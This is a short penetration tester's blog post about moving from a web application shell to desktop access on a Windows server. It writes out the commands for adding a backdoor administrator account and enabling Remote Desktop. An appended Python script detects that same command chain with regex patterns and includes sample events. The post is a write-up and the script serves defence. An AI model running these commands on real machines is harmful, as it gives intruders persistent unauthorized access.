Been extremely busy with loads of work. Anyways, here’s something interesting that I needed to do recently at a customer network to gain access to a server.
I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The application was running off XAMPP under an administrative account, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom programmed application running on the server that I had just gained access to. Here’s what I did:
1. Created a user and added it to the local administrators group using these commands:
net user newadmin newpa$$w0rd /add
net localgroup administrators newadmin /add
net user newadmin
2. Used the following commands to enable Remote Desktop and logged in with my credentials:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set portopening TCP 3389
3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.
A lot of penetration testers reach this wall at some point during their assessments. Hope this helps some tired soul like me.
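The same steps from the defender's side, as an added example that is not part of the original post: a correlation over process-creation command lines (Security event 4688 with command-line auditing, or Sysmon event 1) that flags a host where a local account is created, added to Administrators and Remote Desktop is enabled in a short window. The event field names, host names, web-server parent process names and sample events are assumptions constructed for the illustration.

```python
import re
from datetime import datetime, timedelta

# Behaviours from the post, matched on process-creation command lines
# (Security event 4688 with command-line auditing, or Sysmon event 1).
RULES = {
    "user_created": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I),
    "admin_group_add": re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+.*/add\b", re.I),
    "rdp_enabled": re.compile(r"\breg(\.exe)?\s+add\b.*Terminal Server.*fDenyTSConnections.*/d\s+0\b", re.I),
    "rdp_port_opened": re.compile(r"\bnetsh(\.exe)?\s+(adv)?firewall\b.*\b3389\b", re.I),
}
CHAIN = {"user_created", "admin_group_add", "rdp_enabled"}
WEB_PARENTS = {"httpd.exe", "php-cgi.exe", "php.exe"}  # assumed XAMPP process names

def detect(events, window=timedelta(minutes=15)):
    """One finding per host where the whole CHAIN fires and the first and
    last matching events are no more than `window` apart."""
    hits = {}
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                hits.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["time"]), name, ev))
    findings = []
    for host, rows in hits.items():
        times = [t for t, _, _ in rows]
        seen = {name for _, name, _ in rows}
        if CHAIN <= seen and max(times) - min(times) <= window:
            findings.append({
                "host": host,
                "behaviours": sorted(seen),
                "from_web_server": any(ev["parent"].lower() in WEB_PARENTS for _, _, ev in rows),
            })
    return findings

# Constructed sample events (not real logs); field names are hypothetical.
REG = r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
SAMPLE = [
    {"host": "WEB01", "time": "2024-01-10T09:00:05", "parent": "httpd.exe", "cmdline": "cmd.exe /c net user newadmin REDACTED /add"},
    {"host": "WEB01", "time": "2024-01-10T09:00:40", "parent": "httpd.exe", "cmdline": "cmd.exe /c net localgroup administrators newadmin /add"},
    {"host": "WEB01", "time": "2024-01-10T09:01:10", "parent": "httpd.exe", "cmdline": "cmd.exe /c net user newadmin"},
    {"host": "WEB01", "time": "2024-01-10T09:02:30", "parent": "httpd.exe", "cmdline": "cmd.exe /c " + REG},
    {"host": "WEB01", "time": "2024-01-10T09:02:55", "parent": "httpd.exe", "cmdline": "cmd.exe /c netsh firewall set portopening TCP 3389"},
    {"host": "ADMIN07", "time": "2024-01-10T11:15:00", "parent": "explorer.exe", "cmdline": REG},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

The `from_web_server` flag is the high-signal part: a web server process has no routine reason to spawn `net`, `reg` or `netsh`, whereas an administrator enabling Remote Desktop alone (the ADMIN07 event) does not complete the chain.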